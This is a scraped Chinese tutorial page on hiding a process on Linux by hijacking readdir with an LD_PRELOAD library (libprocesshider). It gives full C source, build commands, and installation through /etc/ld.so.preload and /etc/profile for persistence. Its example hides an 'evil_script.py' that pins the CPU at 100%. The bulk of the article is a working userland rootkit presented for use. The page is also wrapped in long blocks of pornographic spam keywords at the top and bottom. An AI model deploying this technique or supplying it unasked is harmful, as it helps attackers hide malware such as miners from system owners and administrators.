亚洲综合原千岁中文字幕_国产精品99久久久久久久vr_无码人妻aⅴ一区二区三区浪潮_成人h动漫精品一区二区三

主頁 > 知識庫 > linux 下隱藏進程的一種方法及遇到的坑

linux 下隱藏進程的一種方法及遇到的坑

熱門標簽:400電話申請找哪家公司 福州呼叫中心外呼系統哪家好 臨汾電銷機器人費用 地圖標注需要提交啥資料入駐 地圖標注w是什么方向 河南省鄭州市地圖標注 昆明外呼系統 新鄉人工智能電話機器人加盟 七大洲地圖標注

前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下載

2.思路就是利用 LD_PRELOAD 來實現系統函數的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系統的一個環境變量,它可以影響程序的運行時的鏈接(Runtime linker),它允許你定義在程序運行前優先加載的動態鏈接庫。這個功能主要就是用來有選擇性的載入不同動態鏈接庫中的相同函數。通過這個環境變量,我們可以在主程序和其動態鏈接庫的中間加載別的動態鏈接庫,甚至覆蓋正常的函數庫。一方面,我們可以以此功能來使用自己的或是更好的函數(無需別人的源碼),而另一方面,我們也可以以向別人的程序注入程序,從而達到特定的目的。

實現

1.下載程序編譯

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2.移動文件到/usr/local/lib/目錄下

mv libprocesshider.so /usr/local/lib/

3.把它加載到全局動態連接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

測試

1.我們運行evil_script.py

2.此時發現在top 與 ps 中都無法找到 evil_script.py

此時我們發現 cpu 100%,但是卻找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if(fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir)                \

static struct dirent* (*original_##readdir)(DIR*) = NULL;        \

struct dirent* readdir(DIR *dirp)                    \

{                                    \

  if(original_##readdir == NULL) {                  \

    original_##readdir = dlsym(RTLD_NEXT, "readdir");        \

    if(original_##readdir == NULL)                 \

    {                                \

      fprintf(stderr, "Error in dlsym: %s\n", dlerror());     \

    }                                \

  }                                  \

  struct dirent* dir;                         \

  while(1)                              \

  {                                  \

    dir = original_##readdir(dirp);                 \

    if(dir) {                            \

      char dir_name[256];                     \

      char process_name[256];                   \

      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&    \

        strcmp(dir_name, "/proc") == 0 &&            \

        get_process_name(dir->d_name, process_name) &&     \

        strcmp(process_name, process_to_filter) == 0) {     \

        continue;                        \

      }                              \

    }                                \

    break;                             \

  }                                  \

  return dir;                             \

}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1.程序定義了一個變量 process_to_filter 來控制不顯示哪個進程名

2.重寫readdir,

strcmp(process_name, process_to_filter) == 0)

當發現當前進程名稱與 process_to_filter 相同時,繼續循環.

遇到的坑

1.某些Linux中這個程序編譯通不過

解決方法

刪除最后兩行中的一行

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
并不會生效
 此時我們需要配置環境變量
shell bmfxgkpt-yhd:~# vi /etc/profile
增加一行
shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

總結

以上所述是小編給大家介紹的linux 下隱藏進程的一種方法及遇到的坑,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!

標簽:烏海 股票 臨沂 鎮江 岳陽 紅河 四川

巨人網絡通訊聲明:本文標題《linux 下隱藏進程的一種方法及遇到的坑》,本文關鍵詞  linux,下,隱藏,進程,的,一種,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux 下隱藏進程的一種方法及遇到的坑》相關的同類信息!
  • 本頁收集關于linux 下隱藏進程的一種方法及遇到的坑的相關信息資訊供網民參考!
  • 推薦文章
    香蕉视频一级| 日韩一级黄色大片| 成人免费一级纶理片| 亚洲第一页乱| 国产精品自拍亚洲| 久久国产精品只做精品| 午夜激情视频在线观看| 欧美a级片免费看| 国产一区二区福利久久| 韩国三级香港三级日本三级la | 国产精品1024永久免费视频| 欧美激情在线精品video| 成人a大片在线观看| 九九精品在线| 精品久久久久久综合网| 国产成a人片在线观看视频| 免费国产在线观看不卡| 中文字幕一区二区三区 精品| 国产网站免费观看| 99久久精品国产麻豆| 欧美激情一区二区三区视频| 色综合久久天天综线观看| 国产91精品系列在线观看| 成人免费福利片在线观看| 欧美激情影院| 日日夜人人澡人人澡人人看免| 精品国产亚一区二区三区| 韩国三级一区| 91麻豆tv| 国产激情一区二区三区| 韩国三级视频网站| 国产91素人搭讪系列天堂| 99热精品一区| 99久久精品国产麻豆| 日日日夜夜操| 91麻豆精品国产自产在线| 国产a视频| 成人免费福利片在线观看| 欧美国产日韩精品| 欧美一级视| 国产不卡高清在线观看视频 | 天堂网中文字幕| 免费国产一级特黄aa大片在线| 国产精品123| 欧美另类videosbestsex高清 | 亚洲精品影院| 精品国产香蕉伊思人在线又爽又黄| 国产成人精品综合久久久| 国产一级生活片| 日韩一级黄色大片| 国产视频一区二区在线观看| 色综合久久天天综合观看| 精品国产一区二区三区精东影业| 九九精品久久| 国产成a人片在线观看视频| 日本免费区| 国产a一级| 麻豆系列 在线视频| 九九久久国产精品| 日韩专区在线播放| 亚欧成人乱码一区二区| 精品国产亚洲一区二区三区| 九九九国产| 毛片电影网| 成人影视在线观看| 国产a视频| 亚洲第一色在线| 99久久精品费精品国产一区二区| 999精品影视在线观看| 欧美a免费| 韩国三级视频在线观看| 国产一区二区精品| 久久精品成人一区二区三区| 日本在线不卡视频| 中文字幕一区二区三区精彩视频| 久久精品道一区二区三区| 二级片在线观看| 欧美大片毛片aaa免费看| 美女免费精品视频在线观看| 黄色免费网站在线| 欧美激情影院| 一级女人毛片人一女人| 国产不卡高清在线观看视频 | 亚飞与亚基在线观看| 精品国产亚洲一区二区三区| 国产a视频精品免费观看| 麻豆污视频| 久久福利影视| 精品在线观看国产| | 国产成人欧美一区二区三区的| 日本免费乱人伦在线观看| 999久久久免费精品国产牛牛| 美国一区二区三区| 免费国产一级特黄aa大片在线| 高清一级片| 精品视频在线观看一区二区三区| 台湾毛片| 久久久成人影院| 亚久久伊人精品青青草原2020| 日本免费区| 九九九国产| 日韩免费在线| 九九九网站| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 国产成人欧美一区二区三区的| 国产成人精品综合| 四虎久久影院| 国产成人啪精品| 成人影院一区二区三区| 国产高清在线精品一区a| 中文字幕97| 成人影视在线观看| 成人高清视频免费观看| 精品国产亚一区二区三区| 一本高清在线| 国产美女在线一区二区三区| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 国产伦久视频免费观看视频| 亚洲 男人 天堂| 国产a毛片| 欧美a免费| 国产综合91天堂亚洲国产| 免费的黄色小视频| 久久精品大片| 日韩专区一区| 亚欧成人乱码一区二区| 色综合久久天天综线观看| 亚洲 欧美 成人日韩| 成人影院一区二区三区| 久久精品欧美一区二区| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 亚洲 男人 天堂| 亚洲 激情| 日韩专区在线播放| 国产伦理精品| 日本特黄特黄aaaaa大片| 亚欧成人乱码一区二区| 国产不卡精品一区二区三区| 九九久久国产精品| 成人影院一区二区三区| 一 级 黄 中国色 片| 九九久久99| 欧美另类videosbestsex高清| 久久国产精品自线拍免费| 久久精品免视看国产明星| 国产一区二区精品久久| 精品在线观看一区| 九九干| 天天做人人爱夜夜爽2020毛片| 成人影视在线观看| 国产欧美精品午夜在线播放| 久久久成人影院| 精品久久久久久免费影院| 国产网站免费| 韩国三级香港三级日本三级| 高清一级片| 国产一区二区精品在线观看| 亚飞与亚基在线观看| 黄视频网站在线免费观看| 日韩专区亚洲综合久久| 可以在线看黄的网站| 亚洲天堂免费观看| 国产麻豆精品| 国产精品自拍亚洲| 台湾毛片| 精品视频在线观看一区二区三区| 91麻豆国产| 国产视频一区二区在线播放| 国产麻豆精品hdvideoss| 91麻豆精品国产高清在线 | 黄视频网站免费看| 九九久久国产精品| 免费毛片基地| 999久久久免费精品国产牛牛| 国产欧美精品| | 久久久成人网| 国产一区二区精品在线观看| 亚欧视频在线| 久久福利影视| 黄视频网站在线观看| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 国产精品免费精品自在线观看| 久久99中文字幕久久| 色综合久久天天综线观看| 国产一区二区精品尤物| 色综合久久天天综合| 久久精品人人做人人爽97| 国产a视频| 亚洲第一色在线| 国产一区二区精品尤物| 日本在线不卡视频| 国产不卡福利| 国产伦精品一区二区三区无广告 | 日韩在线观看网站| 黄色免费三级| 成人a大片在线观看| 999精品在线| 日本免费乱理伦片在线观看2018|